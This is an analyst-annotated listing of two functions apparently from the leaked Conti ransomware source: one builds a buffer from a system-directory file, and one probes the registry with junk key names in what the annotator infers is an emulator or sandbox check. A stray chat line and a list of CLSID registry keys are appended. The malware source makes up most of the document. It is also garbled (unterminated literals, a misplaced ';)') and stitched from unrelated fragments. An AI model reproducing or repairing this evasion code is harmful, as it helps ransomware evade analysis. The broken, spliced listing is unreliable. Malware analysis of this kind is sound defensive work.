Conti.Functions()
// Analyst notes (leaked Conti listing; annotated for analysis, not repaired):
// build a ~150000-byte "random" byte string by reading a real file out of the
// Windows system directory. The result is a heap buffer (new char[]) that the
// caller owns; nothing on this page frees it. Presumably it is the `buf` that
// QueryReg() below consumes — the call site is not on this page, so confirm.
//
// Observable behaviour:
//   * enumerates <system dir>\* with FindFirstFileA/FindNextFileA and keeps up
//     to 5000 names of non-directory entries larger than 150000 bytes;
//   * selects entry 8 % count — the `// random` / `// set randomly` comments
//     mark values the author meant to randomize, but as written both
//     `randomNum` (8) and `fileSize` (150000) are constants, so the choice is
//     deterministic for a given system directory;
//   * opens that file read-only, reads it whole, then rewrites every zero byte
//     in the first 150000 bytes to a non-zero value derived from its index,
//     restarting the scan from the start after every substitution;
//   * writes a terminating NUL at offset 149999 and returns the buffer.
//
// Defects visible on this page (left unchanged):
//   * FindFirstFileA, CreateFileA, GetFileSize and ReadFile results are never
//     checked. With no matching file `count` stays 0 and `randomNum %= count`
//     divides by zero; a failed GetFileSize (INVALID_FILE_SIZE) turns the
//     `new char[size]` below into a ~4 GiB allocation.
//   * `fileNamesArr` (5000 x MAX_PATH) and `hFile` are never released — the
//     cleanup near the end is commented out.
//   * The NUL-scrub loop resets `i` after each substitution, so it is
//     quadratic in the number of zero bytes (it does terminate: every
//     substitution removes one zero and introduces none).
//   * Gist rendering has garbled three lines: both StringCchCatA string
//     literals carry an extra backslash (the second, as shown, escapes its own
//     closing quote and leaves the literal unterminated — presumably "\\*" and
//     "\\" in the original), and the StringCchCopyA call ends in `;)` instead
//     of `);`. The listing does not compile as pasted.
char* GetRandomBuf()
{
char tempFileName[MAX_PATH];
char targetFileName[MAX_PATH];
// random
size_t randomNum = 8; // constant as written; becomes the index into fileNamesArr below
WIN32_FIND_DATAA ffd;
DWORD size = 0;
// Both buffers start as the system directory path (e.g. ...\system32);
// tempFileName becomes the search pattern, targetFileName the chosen file.
GetSystemDirectoryA((LPSTR)tempFileName, (UINT)MAX_PATH);
GetSystemDirectoryA((LPSTR)targetFileName, (UINT)MAX_PATH);
// Append the "\*" wildcard (literal is backslash-garbled in this rendering).
StringCchCatA(tempFileName, MAX_PATH, "\\\*");
// Return value not checked: on INVALID_HANDLE_VALUE the loop below reads an
// uninitialized `ffd`.
HANDLE f = FindFirstFileA(tempFileName, &ffd);
size_t count = 0;
// 5000 x MAX_PATH name slots, allocated up front and never deleted.
char** fileNamesArr = new char*[5000];
DWORD rbRead;
for (size_t i = 0; i < 5000; ++i)
fileNamesArr[i] = new char[MAX_PATH];
// set randomly
size_t fileSize = 150000; // constant as written; minimum candidate size and scrub length
do
{
if (!(ffd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) // skip directories
{
// Only files larger than fileSize qualify, so the 150000-byte scrub below
// stays inside the data that ReadFile fills (assuming the read succeeds).
if (ffd.nFileSizeLow > fileSize)
{
int a = 1;
int b = 2;
// NOTE(review): `;)` is a rendering/paste artifact of `);` — kept as-is.
StringCchCopyA(fileNamesArr[count], MAX_PATH, ffd.cFileName;)
++count;
a += b + count; // dead arithmetic: `a` is never read again (filler, presumably)
}
}
} while (FindNextFileA(f, &ffd) && count < 5000);
FindClose((HANDLE)f);
// Pick the candidate. Unsigned modulo by zero (no candidates) is undefined.
randomNum %= count;
// Append the path separator (literal is backslash-garbled in this rendering:
// as shown, `\"` escapes the closing quote).
StringCchCatA(targetFileName, MAX_PATH, "\\\");
StringCchCatA(targetFileName, MAX_PATH, fileNamesArr[randomNum]);
// Read-only, no sharing (dwShareMode 0); handle validity is not checked and
// the handle is never closed on this page.
HANDLE hFile = CreateFileA(targetFileName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
size = (DWORD)GetFileSize((HANDLE)hFile, nullptr); // INVALID_FILE_SIZE on failure, unchecked
char* buf = new char[size];
ReadFile((HANDLE)hFile, buf, size, &rbRead, nullptr); // result and rbRead unchecked
// Scrub zero bytes out of the first fileSize bytes so the buffer can be used
// as a C string. Each zero is replaced by (32*i * (124*i - 44)) % 255, or 23
// when that is 0 (always the case for i == 0); assigning to char may wrap
// negative on a signed-char build, but never back to zero.
for (DWORD i = 0; i < fileSize; ++i)
{
if (buf[i] == 0)
{
size_t z = i;
size_t t = i * 32;
size_t y = i * 123 - 44 + i; // DWORD arithmetic wraps for i == 0; harmless since t == 0 there
z = t * y % 255;
if (z != 0)
buf[i] = z;
else
buf[i] = z + 23;
i = 0; // restart the scan (the for-loop's ++i makes the next index 1)
}
}
/*delete[] fileNamesArr;
pCloseHandle(hFile);
*/
// Cleanup above is commented out in the leak: fileNamesArr and hFile leak.
buf[fileSize - 1] = 0; // terminate at offset 149999; bytes beyond are never used as string data here
return buf;
}
[24.09.21 15:37:40] orval: ``
// Analyst notes (leaked Conti listing; annotated for analysis, not repaired):
// probe HKEY_CURRENT_USER with nonsense subkey names sliced out of `buf` and
// report whether "too many" probes behaved as if the key existed. On a normal
// Windows install an 11-byte slice of file data is not an existing HKCU
// subkey, so RegOpenKeyExA returns ERROR_FILE_NOT_FOUND and the slice is
// skipped; the counter grows only when the open does NOT fail that way (and
// hKey is non-NULL) but the following value query then fails. The caller's use
// of the result is not on this page; the shape — random probes, a 20 s
// budget, a threshold of 10 — is consistent with an environment/emulator
// sanity check, but that intent is inferred, not shown here.
//
// Parameters:
//   buf       - NUL-terminated byte string; presumably the buffer returned by
//               GetRandomBuf() above (confirm at the call site).
//   startTime - a GetTickCount() value taken by the caller; probing stops
//               once 20 s have elapsed from it.
// Returns true when more than 10 probes were counted.
//
// Defects visible on this page (left unchanged):
//   * `hKey` is uninitialized and never closed. When the open fails with an
//     error other than ERROR_FILE_NOT_FOUND, the `hKey` test reads whatever
//     was on the stack.
//   * `parameterValue` points at a string literal yet is handed to
//     RegQueryValueExA as the output buffer — a write into read-only data.
//     `dataSize` is an in/out argument and is never reset between calls.
//   * `temp` comes from MyHeapAlloc but is released with free(); whether the
//     two match depends on MyHeapAlloc, which is not on this page.
//   * `StrLen(buf) - 18` is unsigned arithmetic and wraps for inputs shorter
//     than 18 bytes, turning the loop into reads past the end of `buf`.
//   * StrLen(buf) is re-evaluated on every iteration.
bool QueryReg(char* buf, DWORD startTime)
{
size_t result = 0; // number of probes counted as "hits"
LSTATUS errCode = 0;
HKEY hKey; // uninitialized; see notes above
size_t step = 0; // byte offset into buf of the current 11-byte window
//do random
char* parameterName = (char*) "zsadsgjea"; // value name queried under each opened key (constant as written)
//do random
char* parameterValue = (char*) "svogfiifotuz"; // used as RegQueryValueExA output buffer (string literal!)
DWORD dataSize = 12; // byte length of the literal above, excluding its NUL; updated by each query
// Walk buf while at least 18 bytes remain past `step` (the window itself is 11).
while (step < StrLen(buf) - 18)
{
// 11-byte window of buf, NUL-terminated, used verbatim as an HKCU subkey name.
char* temp = (char*)MyHeapAlloc(12);// new char[12];
temp[11] = 0;
m_memcpy(temp, buf + step, 11);
errCode = (LSTATUS)RegOpenKeyExA((HKEY)HKEY_CURRENT_USER, temp, (DWORD)0, (REGSAM)KEY_READ, &hKey);
// Any outcome other than "key not found" (with a non-NULL handle) is a
// candidate hit; other failures, e.g. ERROR_INVALID_PARAMETER, also pass
// this test and then depend on the uninitialized hKey.
if (errCode != ERROR_FILE_NOT_FOUND && hKey)
{
errCode = (LSTATUS)RegQueryValueExA(hKey, (LPCSTR)parameterName, nullptr, nullptr, (LPBYTE)parameterValue, &dataSize);
// Counted only when the key opened but the value query failed.
if (errCode != ERROR_SUCCESS && hKey)
++result;
}
//step += 18;
step += 40; // stride between windows (18 was the earlier value; kept above as a comment)
free(temp);
// Wall-clock budget: stop probing after 20 s (GetTickCount wraps every ~49.7 days).
if ((DWORD)GetTickCount() - startTime > 1000 * 20)
break;
}
return result > 10;
}

HKEY_CLASSES_ROOT\CLSID\{27F71832-6815-48CB-902A-7A1D891BA962} - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{294935CE-F637-4E7C-A41B-AB255460B862} - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{41FCCC3A-1FA1-4949-953A-6EE61C46A4D1} Microsoft.Audio.AudioClient Binder - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{444F7305-1D7D-4BE9-8C29-CC3F1D220C40} - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{562462DD-4F9A-4110-9D6A-C3CA0407FF76} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{69A95A38-C637-46A0-9FB2-1C939AEBF2E8} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{6EC153C1-371E-47E1-A896-2F7F80EB7842} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{73843B93-848F-453B-953D-2E5B911429DC} - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{870AF99C-171D-4f9e-AF0D-E63DF40C2BC9} - 9 cmd
HKEY_CLASSES_ROOT\CLSID\{8D9945C3-A621-4F52-8641-6D8B755F42E2} - 12 cmd system blocked
HKEY_CLASSES_ROOT\CLSID\{ede7f087-890f-491c-b906-9abb31896960} CLSID_EuVolumeNotificationCallback - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10} psfactorybuffer - 2 cmd
